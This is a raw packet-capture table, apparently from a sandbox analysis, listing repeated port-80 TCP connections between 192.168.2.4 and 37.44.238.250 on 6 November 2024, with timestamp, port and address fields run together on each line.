                                                                    Nov 6, 2024 03:38:56.452958107 CET805011537.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:56.560334921 CET5011680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:56.565248013 CET805011637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:56.565438986 CET5011680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:56.565592051 CET5011680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:56.570389986 CET805011637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:56.797730923 CET5011580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:56.802690029 CET805011537.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:56.802704096 CET805011537.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:56.922693968 CET5011680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:56.927656889 CET805011637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:57.290230036 CET805011537.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:57.362183094 CET805011537.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:57.362257004 CET5011580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:57.383259058 CET805011637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:57.447248936 CET5011680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:57.655921936 CET805011637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:57.656372070 CET805011637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:57.656580925 CET5011680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:57.778438091 CET5011580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:57.778707981 CET5011680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:57.779319048 CET5011780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:57.783575058 CET805011537.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:57.783627033 CET5011580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:57.783935070 CET805011637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:57.783976078 CET5011680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:57.784121037 CET805011737.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:57.784183025 CET5011780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:57.784317970 CET5011780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:57.789041042 CET805011737.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:58.141700029 CET5011780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:58.146730900 CET805011737.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:58.603506088 CET805011737.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:58.678256035 CET805011737.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:58.678320885 CET5011780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:58.808918953 CET5011880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:58.813764095 CET805011837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:58.813836098 CET5011880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:58.813951015 CET5011880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:58.818726063 CET805011837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:59.172717094 CET5011880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:59.177630901 CET805011837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:59.630435944 CET805011837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:59.701581955 CET805011837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:59.701637983 CET5011880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:00.443284988 CET5011880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:00.443996906 CET5011980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:00.448683977 CET805011837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:00.448724031 CET5011880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:00.448858976 CET805011937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:00.448910952 CET5011980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:00.449150085 CET5011980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:00.453876972 CET805011937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:00.807782888 CET5011980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:00.812704086 CET805011937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:01.399779081 CET805011937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:01.399998903 CET805011937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:01.400011063 CET805011937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:01.400083065 CET5011980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:01.559926987 CET5011980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:01.560864925 CET5012080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:01.565165043 CET805011937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:01.565218925 CET5011980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:01.565655947 CET805012037.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:01.565861940 CET5012080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:01.565989017 CET5012080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:01.570768118 CET805012037.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:01.922717094 CET5012080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:01.927556038 CET805012037.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:02.377213001 CET805012037.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:02.377873898 CET5012180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:02.382741928 CET805012137.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:02.382811069 CET5012180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:02.382942915 CET5012180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:02.387785912 CET805012137.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:02.414822102 CET5012080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:02.420025110 CET805012037.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:02.420139074 CET5012080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:02.703012943 CET5012280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:02.707863092 CET805012237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:02.707933903 CET5012280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:02.708014965 CET5012280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:02.712754011 CET805012237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:02.735289097 CET5012180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:02.740103960 CET805012137.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:02.740328074 CET805012137.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:03.063471079 CET5012280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:03.068334103 CET805012237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:03.224968910 CET805012137.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:03.300338030 CET805012137.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:03.300406933 CET5012180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:03.518095016 CET805012237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:03.585042000 CET805012237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:03.585120916 CET5012280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:03.700020075 CET5012180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:03.700258970 CET5012280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:03.700881958 CET5012380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:03.705123901 CET805012137.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:03.705188990 CET5012180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:03.705405951 CET805012237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:03.705473900 CET5012280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:03.705813885 CET805012337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:03.705869913 CET5012380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:03.705976009 CET5012380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:03.710701942 CET805012337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:04.063492060 CET5012380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:04.068416119 CET805012337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:04.524857998 CET805012337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:04.614190102 CET805012337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:04.615442038 CET5012380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:04.731197119 CET5012380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:04.731519938 CET5012480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:04.736303091 CET805012337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:04.736450911 CET805012437.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:04.736515999 CET5012380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:04.736552954 CET5012480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:04.736673117 CET5012480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:04.741374016 CET805012437.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:05.094713926 CET5012480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:05.099798918 CET805012437.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:05.554753065 CET805012437.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:05.630374908 CET805012437.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:05.630460978 CET5012480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:05.747819901 CET5012480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:05.748272896 CET5012580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:05.753021002 CET805012437.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:05.753084898 CET5012480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:05.753113031 CET805012537.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:05.753184080 CET5012580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:05.753454924 CET5012580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:05.758219957 CET805012537.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:06.110245943 CET5012580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:06.115228891 CET805012537.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:06.572362900 CET805012537.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:06.625741005 CET5012580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:06.645905018 CET805012537.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:06.735114098 CET5012580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:06.761941910 CET5012580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:06.762300014 CET5012680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:06.767002106 CET805012537.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:06.767160892 CET805012637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:06.767231941 CET5012580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:06.767270088 CET5012680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:06.767365932 CET5012680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:06.772072077 CET805012637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:07.125850916 CET5012680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:07.130778074 CET805012637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:07.585681915 CET805012637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:07.664144993 CET805012637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:07.664216995 CET5012680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:07.776114941 CET5012680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:07.776618004 CET5012780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:07.781411886 CET805012737.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:07.781498909 CET5012780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:07.781579971 CET805012637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:07.781639099 CET5012680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:07.781730890 CET5012780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:07.803522110 CET805012737.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:08.125845909 CET5012780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:08.131736994 CET805012737.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:08.314459085 CET5012880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:08.314662933 CET5012780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:08.319505930 CET805012837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:08.323462963 CET5012880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:08.323539972 CET5012880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:08.328278065 CET805012837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:08.361561060 CET805012737.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:08.376992941 CET805012737.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:08.377048016 CET5012780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:08.433947086 CET5012980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:08.438812017 CET805012937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:08.441555977 CET5012980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:08.441555977 CET5012980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:08.446394920 CET805012937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:08.672713041 CET5012880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:08.679461002 CET805012837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:08.681118965 CET805012837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:08.797709942 CET5012980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:08.802552938 CET805012937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:09.165200949 CET805012837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:09.219511986 CET5012880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:09.242007017 CET805012837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:09.245186090 CET805012937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:09.282010078 CET5012880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:09.320733070 CET805012937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:09.320785046 CET5012980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:09.500834942 CET5012980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:09.500839949 CET5012880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:09.506275892 CET805012937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:09.506344080 CET5012980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:09.506418943 CET805012837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:09.506459951 CET5012880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:09.535504103 CET5013080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:09.540296078 CET805013037.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:09.540376902 CET5013080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:09.540478945 CET5013080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:09.545202971 CET805013037.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:09.891505957 CET5013080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:09.896358013 CET805013037.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:10.352097988 CET805013037.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:10.428319931 CET805013037.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:10.428401947 CET5013080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:10.553035975 CET5013180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:10.557861090 CET805013137.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:10.557969093 CET5013180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:10.558006048 CET5013180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:10.562741995 CET805013137.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:10.907097101 CET5013180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:10.911919117 CET805013137.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:11.376306057 CET805013137.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:11.422625065 CET5013180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:11.453664064 CET805013137.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:11.500750065 CET5013180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:11.575330973 CET5013180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:11.576260090 CET5013280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:11.580634117 CET805013137.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:11.580693960 CET5013180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:11.581198931 CET805013237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:11.581259012 CET5013280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:11.581404924 CET5013280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:11.586162090 CET805013237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:11.938318014 CET5013280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:11.943280935 CET805013237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:12.392910957 CET805013237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:12.438261986 CET5013280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:12.473086119 CET805013237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:12.589561939 CET5013280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:12.589999914 CET5013380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:12.594908953 CET805013237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:12.594921112 CET805013337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:12.594966888 CET5013280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:12.595002890 CET5013380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:12.595108986 CET5013380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:12.599822044 CET805013337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:12.953946114 CET5013380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:12.958966017 CET805013337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:13.404814005 CET805013337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:13.476664066 CET805013337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:13.476726055 CET5013380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:13.595357895 CET5013380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:13.596512079 CET5013480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:13.600601912 CET805013337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:13.600651979 CET5013380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:13.601375103 CET805013437.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:13.601427078 CET5013480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:13.601519108 CET5013480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:13.606431961 CET805013437.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:13.953950882 CET5013480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:13.959038019 CET805013437.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:14.252090931 CET5013580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:14.255388021 CET5013480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:14.279623985 CET805013537.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:14.281491041 CET805013437.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:14.281595945 CET5013480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:14.281600952 CET5013580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:14.281761885 CET5013580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:14.286439896 CET805013537.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:14.370681047 CET5013080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:14.373676062 CET5013680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:14.383511066 CET805013637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:14.385067940 CET5013680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:14.385215044 CET5013680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:14.389962912 CET805013637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:14.625896931 CET5013580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:14.630783081 CET805013537.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:14.630851030 CET805013537.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:14.735388994 CET5013680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:14.741425991 CET805013637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:15.093873024 CET805013537.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:15.173933029 CET805013537.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:15.174051046 CET5013580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:15.226516008 CET805013637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:15.306854010 CET805013637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:15.306911945 CET5013680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:15.437582970 CET5013580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:15.437699080 CET5013680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:15.438390970 CET5013780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:15.442867994 CET805013537.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:15.442918062 CET5013580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:15.443150997 CET805013737.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:15.443207026 CET5013780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:15.443428040 CET5013780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:15.443640947 CET805013637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:15.443682909 CET5013680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:15.448132992 CET805013737.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:15.797815084 CET5013780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:15.802726984 CET805013737.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:16.254158974 CET805013737.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:16.331206083 CET805013737.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:16.335387945 CET5013780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:16.449428082 CET5013780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:16.449623108 CET5013880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:16.454477072 CET805013837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:16.454488039 CET805013737.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:16.454663038 CET5013780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:16.454663038 CET5013880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:16.454763889 CET5013880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:16.459487915 CET805013837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:16.813807964 CET5013880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:16.818873882 CET805013837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:17.265634060 CET805013837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:17.343631983 CET805013837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:17.343686104 CET5013880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:17.468950033 CET5013880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:17.469742060 CET5013980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:17.474232912 CET805013837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:17.474282026 CET5013880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:17.474611044 CET805013937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:17.474670887 CET5013980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:17.474858046 CET5013980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:17.479677916 CET805013937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:17.829047918 CET5013980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:17.833920002 CET805013937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:18.991398096 CET805013937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:18.991413116 CET805013937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:18.991425037 CET805013937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:18.991436958 CET805013937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:18.991514921 CET5013980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:18.991516113 CET5013980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:19.109298944 CET5013980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:19.109608889 CET5014080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:19.114485979 CET805014037.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:19.119246960 CET805013937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:19.119328022 CET5014080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:19.119333982 CET5013980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:19.119432926 CET5014080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:19.124217987 CET805014037.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:19.469599009 CET5014080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:19.474596977 CET805014037.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:19.929331064 CET805014037.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:20.002082109 CET805014037.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:20.002151966 CET5014080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:20.122080088 CET5014080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:20.122706890 CET5014180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:20.127367020 CET805014037.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:20.127438068 CET5014080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:20.127516031 CET805014137.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:20.127578020 CET5014180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:20.127691984 CET5014180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:20.132450104 CET805014137.44.238.250192.168.2.4
